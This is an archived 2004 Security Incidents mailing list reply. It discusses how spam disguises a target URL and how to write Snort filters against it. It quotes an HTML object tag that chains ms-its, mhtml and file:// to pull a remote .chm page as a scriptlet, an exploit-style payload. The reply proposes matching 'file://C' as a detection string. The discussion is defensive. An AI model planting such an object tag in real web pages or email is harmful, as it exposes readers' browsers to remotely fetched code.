Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Re: A new technique to disguise a target URL in spam

From: Jeremiah Cornelius <jeremiah () nur net>
Date: Mon, 5 Apr 2004 18:09:59 -0700
On Monday 05 April 2004 10:43, Stef wrote:

      <object data="ms-its:mhtml:file://C
      \\MAIN.MHT!http://salecheap.net//main.chm::/main.htm";
      type="text/x-scriptlet"></object>
      </body>
      </html>
      test.htm (END)


Now how would one go about writing filters for - let's say - Snort -
based on something like this? Could it be - in pseudo-code - something
like: if location.ref <> src ==> then "take action"? Would it be safe
to assume that everything where the location.ref is different than src
is malicious?


I would start looking at the "low-hanging fruit"...

file://C might be a decent expression to trigger any kind of action.

---------------------------------------------------------------------------
Free 30-day trial: firewall with virus/spam protection, URL filtering, VPN,
wireless security

Protect your network against hackers, viruses, spam and other risks with Astaro
Security Linux, the comprehensive security solution that combines six
applications in one software solution for ease of use and lower total cost of
ownership.

Download your free trial at
http://www.securityfocus.com/sponsor/Astaro_incidents_040301
----------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: